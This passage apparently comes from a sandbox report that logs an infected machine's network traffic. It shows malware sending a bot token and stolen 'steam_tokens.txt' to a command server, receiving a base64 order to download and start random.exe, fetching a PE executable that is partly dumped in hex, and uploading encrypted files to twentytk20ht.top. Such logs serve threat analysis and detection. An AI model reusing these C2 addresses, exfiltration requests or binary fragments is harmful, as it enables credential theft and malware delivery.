                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:03 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=89
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:03.703948975 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHID
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 363
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: ------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="file"------IIEHCFIDHIDGIDHJEHID--
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:04.645628929 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:03 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=88
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:04.684952021 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFH
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 272
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="message"ybncbhylepme------FIDHIEBAAKJDHIECAAFH--
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:05.133629084 CET271INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:04 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 68
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=87
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d
                                                                                                                                                                                                                                                            Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            26192.168.2.449896185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:42.525932074 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 37 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019674001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:43.406236887 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            27192.168.2.44989831.41.244.11801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:43.835678101 CET63OUTGET /files/geopoxid/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.140471935 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:44 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 1861632
                                                                                                                                                                                                                                                            Last-Modified: Thu, 19 Dec 2024 20:35:58 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "676483ae-1c6800"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 50 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 49 00 00 04 00 00 49 41 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gPI@IIA@T0h 1 H@.rsrc X@.idata 0Z@ *@\@wekcazboP/^@ttllozcv@I@@.taggant0PI"F@
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.140501022 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.140510082 CET448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.140607119 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.140638113 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: ~"Q'JZw_Z*4&
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.140650034 CET448INData Raw: 1f d4 2a bb a8 93 6d e6 c0 25 31 ef bb 64 3b a6 be 1a f6 bb 39 d1 a0 59 12 03 8b 0c 27 41 96 6e e8 ee e5 cc ab cc d1 ff 25 ee ad 3b e8 34 eb 63 ca 9d af 38 2f fe 22 48 e1 29 a2 e6 d3 96 75 17 60 2e a3 40 03 32 f6 c7 f7 7a 68 db 6a 40 48 f9 e0 7d
                                                                                                                                                                                                                                                            Data Ascii: *m%1d;9Y'An%;4c8/"H)u`.@2zhj@H}~8o=4QLcNfVUpA9q|Z-&S2U2zj0:UO5hDsw,![7u +_I+>AJo#gQ;
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.140871048 CET1236INData Raw: 97 3b e5 23 b5 da a7 73 07 7e 28 c8 44 1c a2 3b f8 76 9a c4 aa 4f 5c a1 af d2 b3 68 b6 50 76 ec ff b6 3c 34 c3 2e a6 05 22 5b de 53 bf 26 89 25 11 da 97 b1 7f 7a a4 07 23 82 02 ed 2c 5a b7 c6 8b 27 86 d9 2a 3e b3 00 8f 2d bc 57 78 22 4b 17 e0 ce
                                                                                                                                                                                                                                                            Data Ascii: ;#s~(D;vO\hPv<4."[S&%z#,Z'*>-Wx"Ke'!s\8o4e[W!|$}owtcry <r'UHZS^Xk#>#2RZ>->s(@91"sTv'r(K(D9Xa
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.140899897 CET1236INData Raw: bd 8e 33 dd ec 7d e8 7b b5 46 3f fc ca 02 06 d9 d6 bd c9 0e f0 3d 9f 69 67 bf 00 c8 7e 33 23 c5 12 5e d6 41 ce 4b a8 cf 26 6f 27 dc b7 0b a2 de 24 51 c7 46 49 d6 af 78 8a db 9d 27 cc 20 aa f6 38 9a 03 19 6c b8 90 de bb 77 0b 28 b5 9d b7 10 bf 5b
                                                                                                                                                                                                                                                            Data Ascii: 3}{F?=ig~3#^AK&o'$QFIx' 8lw([k4< Oi"PVmkOev}`GCMw-d:_E7bR4HKacQdZ|fMm,&qIF.REt6qvX)jPXs( <i2~kv"-#
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.140927076 CET1236INData Raw: e3 cc 1c 61 6c 9f 65 97 06 92 b1 5f 4b 49 a3 5e ff 5a 4a e7 6b 6b e2 96 65 c2 1e 78 47 9b b5 5c 3e d4 bb 51 69 7b 66 a0 50 8d ba 99 15 28 78 ab 96 b1 d8 4a 56 28 63 2e 4a ec 54 e0 a7 db ab 7b 2b a3 a3 ed 6a 91 c4 33 f2 98 10 da f3 66 20 a6 4f d6
                                                                                                                                                                                                                                                            Data Ascii: ale_KI^ZJkkexG\>Qi{fP(xJV(c.JT{+j3f Om>"d<Yc2"-(MU!x~#%f'qC#81Sx{g#8=*/x~9@0=0X=uTfs%X!;mV=x
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.140938044 CET1236INData Raw: ed e2 ab d6 94 c6 9a 68 e9 00 05 3e db ad 1b 50 56 e6 f2 a0 87 96 9f 14 f9 62 ac 2b c4 2b 5d 3c 94 8b 96 11 0b 85 22 37 2c 5d 32 1a a3 8c 44 19 c1 b5 9e 10 d7 ee 27 70 19 b2 ad 5d aa c2 ca a2 22 9a 17 a8 a9 3a 37 f2 fc 40 5d 12 1f 57 20 b1 e5 50
                                                                                                                                                                                                                                                            Data Ascii: h>PVb++]<"7,]2D'p]":7@]W Pjm+-#8l!qAc:np_ZZ C`D(TkT$j+Ju@~}>kZXb-PmjxI0g{U
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.260245085 CET1236INData Raw: ad 7a de d8 55 84 de ba da a8 61 9f a9 3c 3d 66 7b 5c 58 e0 6c c3 11 0c ec ac 0f fb dc 2d c9 a2 fd 92 dd e9 d3 cd ec 54 22 c0 db 50 76 1d 2d ee a7 c9 d9 1a 7a 5c a2 4b 48 a4 a3 14 82 6b d6 c3 d9 01 11 70 87 7a e9 d5 ed 79 2a 64 59 4b f6 35 95 52
                                                                                                                                                                                                                                                            Data Ascii: zUa<=f{\Xl-T"Pv-z\KHkpzy*dYK5Ry0An<cvd_gaf~+;+zb[#;#QU!)_[=tvKI9P+"a]-?[]YM&81rjzhT[)60sS;


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            28192.168.2.449899185.121.15.192805496C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:44.867295027 CET644OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                            Host: twentytk20ht.top
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            Content-Length: 462
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------pRlNtWBsRuZjLrYb6RpUTO
                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 52 6c 4e 74 57 42 73 52 75 5a 6a 4c 72 59 62 36 52 70 55 54 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4a 61 77 69 73 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a d0 3a aa 91 e1 18 a8 82 42 14 ba 0f 2d ad a7 fd cd f4 a3 e0 61 df f7 ca c7 31 a5 bf e9 ee 85 43 ef 84 ad aa c4 92 01 5c 77 3c 23 46 ec f3 fc e7 4a d6 5f 18 06 51 d5 e0 41 9f 76 af 55 af f4 61 fb eb 27 be ac 27 9a 74 40 db a1 11 c2 e8 67 39 01 46 4e c9 5c b6 0f 0b 34 90 da 18 81 73 80 3e 78 a7 94 cd 60 11 87 f5 a1 55 1e 1f e4 68 7f b5 bf 1c 41 0e 54 c7 31 ea 04 46 87 7d fe 91 84 08 0a 45 1c 59 d6 61 6b da 06 48 a7 d5 55 97 ec 94 3a d9 4f 2e 8b 02 ed a8 73 75 0b af 0e b7 e7 23 c2 4f a9 6d 91 c6 b5 c5 e1 a2 8d 85 58 45 42 3c 34 7b [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: --------------------------pRlNtWBsRuZjLrYb6RpUTOContent-Disposition: form-data; name="file"; filename="Jawisu.bin"Content-Type: application/octet-stream:B-a1C\w<#FJ_QAvUa''t@g9FN\4s>x`UhAT1F}EYakHU:O.su#OmXEB<4{8&EWja<~f\!Y\_-FH1IU"=>p?{Zjkm0SXS--------------------------pRlNtWBsRuZjLrYb6RpUTO--
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:46.292817116 CET274INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 2
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            X-RateLimit-Limit: 30
                                                                                                                                                                                                                                                            X-RateLimit-Remaining: 29
                                                                                                                                                                                                                                                            X-RateLimit-Reset: 1734817667
                                                                                                                                                                                                                                                            ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                            Data Raw: 4f 4b
                                                                                                                                                                                                                                                            Data Ascii: OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            29192.168.2.449903185.121.15.192805496C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:48.133439064 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                            Host: twentytk20ht.top
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            Content-Length: 33185
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------ci1ASTSkLc010whmSgp6nP
                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 69 31 41 53 54 53 6b 4c 63 30 31 30 77 68 6d 53 67 70 36 6e 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 75 77 6f 67 75 76 69 67 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a a9 c6 c2 ac bc 9f 87 cf 5d 3f 84 4a 18 42 9c 4b 68 88 9d 0f 2a 17 41 2e 0b a5 a0 78 aa ee 0b 10 20 27 7a 2d 54 47 bd c5 7e f1 7c 9d fe d4 22 45 dd 9a 6d 18 44 9a 7c 80 43 d5 44 10 2e 00 63 fb 7b b7 41 25 cb ff a9 c8 23 4a 2f db a0 e3 03 21 da 12 b7 b3 65 03 19 08 46 70 e7 dd 32 17 a8 34 33 24 f8 54 a3 f1 30 3a 8c 80 a0 ec b3 72 18 f8 fc 2c 0c 3c 88 ce 28 a5 1d ea ad f8 00 3e 66 a4 d0 38 cf dc ef 7e 27 65 e1 be ed 30 f6 e9 41 7d af 63 76 07 15 ad 59 0b 31 76 64 8d 97 11 16 8c 12 0f e5 99 78 d5 68 aa e8 6e 44 23 2a 3c 64 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: --------------------------ci1ASTSkLc010whmSgp6nPContent-Disposition: form-data; name="file"; filename="Huwoguvig.bin"Content-Type: application/octet-stream]?JBKh*A.x 'z-TG~|"EmD|CD.c{A%#J/!eFp243$T0:r,<(>f8~'e0A}cvY1vdxhnD#*<d9"1[e;5G?+"g8Nt<\\N$)H~rE%;<R)/%['>ndeb^?cdg_\`gMW]9k,M0}2}X71FS)B[xK,@ELRuoASoJ7U'"K[C)00ny|vSNh1,Y{]*@5$rYk+\2=_9whu.MY#GAk)Xi>!3f>#EmD>/ouHHIGomG4>pgNJn)W%my!!s6+*S|1)"'+}HVzJuq>.c5>KD1{] -1sqgIl7SPD7^t)DY&$V!+*?<- >\Pl_[J_z8Vj<Om7A#l"'DQ7B\B52FC*EN;pprp(5H [TRUNCATED]
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:48.253228903 CET4944OUTData Raw: 6d 6b 0b 3f 8d 30 1c 1d c2 41 2a bc e1 61 16 72 a9 c3 b9 db 4b 39 87 4b ce 08 4c 73 86 19 3f ed e0 2a 96 d0 c7 2e 85 e2 e0 31 92 87 75 2b 5a 13 ca 81 82 26 dc 4f 8d 6d 9b 1a 4d 92 c9 7a 62 35 91 a1 bf 7b 06 11 1a 5b e2 0b bf 8e 45 78 32 40 bf db
                                                                                                                                                                                                                                                            Data Ascii: mk?0A*arK9KLs?*.1u+Z&OmMzb5{[Ex2@Vgg"Q]l]P`zfw-L5[!'{Q>9Kw&!^V,W|fo(jKtB'l#f%,4.av7d`pG-_Y)k'02
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:48.253273964 CET4944OUTData Raw: c1 e1 c1 72 3e 57 71 37 4f 58 7d 27 55 f6 19 d5 46 ed 7a 77 17 b6 33 7b a4 bf 8e bc 61 b7 f5 ce bf cf 95 77 7d 01 96 96 88 90 5e 3d 9e 5c 08 e5 a1 77 8a 75 de d0 24 e7 de 7e 94 01 39 33 47 c3 f0 52 3f 66 6d de 7c e7 f7 d5 c9 d8 9f d7 ff b3 70 35
                                                                                                                                                                                                                                                            Data Ascii: r>Wq7OX}'UFzw3{aw}^=\wu$~93GR?fm|p5DfGs `vR9'~GGx+8J^m_jOSd&bcd2&:x.U}4YK,l-?(OrJ^s.U{cfCx*S-b
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:48.253330946 CET2472OUTData Raw: d1 a5 b0 0e 54 b4 34 26 d5 8a 06 14 80 b0 e5 c4 bc 0b ef 26 32 5b fc 08 b7 38 e2 73 76 a2 cf c7 80 e2 cf 78 57 66 1b 81 55 94 bc 3f 54 91 b2 60 9e 4b 93 6e 10 79 d4 2e d5 8a d4 17 6f 73 7e 05 a6 b3 a4 e2 85 1f 0a c7 69 92 37 98 a6 2a da 39 c1 fd
                                                                                                                                                                                                                                                            Data Ascii: T4&&2[8svxWfU?T`Kny.os~i7*9?#0dEL :F"a{QLS1HGR?yyH~Xjv0rGE_NPD?7$8xLHe_1;BB hH2kyy9G'T
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:48.253345013 CET2472OUTData Raw: 29 3a 23 33 ad 94 d5 d9 4d e7 84 0a f7 db 4d e1 44 24 a3 14 9a 19 7e 06 27 f3 ce 4f e2 98 26 92 39 0d 58 44 95 54 ac 63 01 2b dd 35 54 bb 0c e5 50 9f 3f 69 d3 cb fc 14 cb ef 1c 00 57 af 26 9e c4 42 0d f7 c0 26 e1 c1 37 d6 e8 4f b3 1e 56 79 4f 9f
                                                                                                                                                                                                                                                            Data Ascii: ):#3MMD$~'O&9XDTc+5TP?iW&B&7OVyOl='HyI@!B]h)IVgo`"z+| | QJ%\1%:"Zk56Uv:"Y@i?vthHJM#yx(L'3YH:8Nt
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:48.253457069 CET4944OUTData Raw: 87 dc c5 67 a6 97 db e5 ac ea af 76 61 46 c3 2f a9 87 2c d0 df 3a ee ef 75 e6 16 17 31 c8 fa 03 26 9c af e4 de 37 18 4b 9d e5 9b 0b c6 de 39 3b 23 cc f7 17 27 19 18 d1 fa 93 2c cf 23 ad b1 e5 5c 1e b2 7e 71 64 5c e6 12 04 ce dc 81 3c ae 28 33 a0
                                                                                                                                                                                                                                                            Data Ascii: gvaF/,:u1&7K9;#',#\~qd\<(3TT"a5X`f7f:rQ;onV=OcLPxrLa&`"?/'_k"4MZMVe\W]p!AFU^SVYF.frwbX5skMEH_F
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:48.253470898 CET1233OUTData Raw: 4f 3d dc 05 c1 44 cb 63 4a 13 1b f6 72 5c 96 71 9f ae 95 19 89 2f 21 0f ad d1 8a ea 84 19 55 ee 00 30 dd 0e 52 c1 b8 91 e7 94 75 e5 5b bb 48 75 aa 67 b0 5b 6f 23 fd 0e 4a c8 52 a3 f2 2f 3f e0 44 c9 ee dd 70 c9 25 8a be 2b 23 28 06 2b ce 75 72 84
                                                                                                                                                                                                                                                            Data Ascii: O=DcJr\q/!U0Ru[Hug[o#JR/?Dp%+#(+ur?Bs%ax:vcl`sb)M/x@u\lX=0E~^`OU#Wq[(?zbB/u*s0X0s" aY<Wtm&C&o[y
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:49.751039028 CET274INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:49 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 2
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            X-RateLimit-Limit: 30
                                                                                                                                                                                                                                                            X-RateLimit-Remaining: 28
                                                                                                                                                                                                                                                            X-RateLimit-Reset: 1734817667
                                                                                                                                                                                                                                                            ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                            Data Raw: 4f 4b
                                                                                                                                                                                                                                                            Data Ascii: OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            30192.168.2.449904185.156.73.23807124C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:48.963898897 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
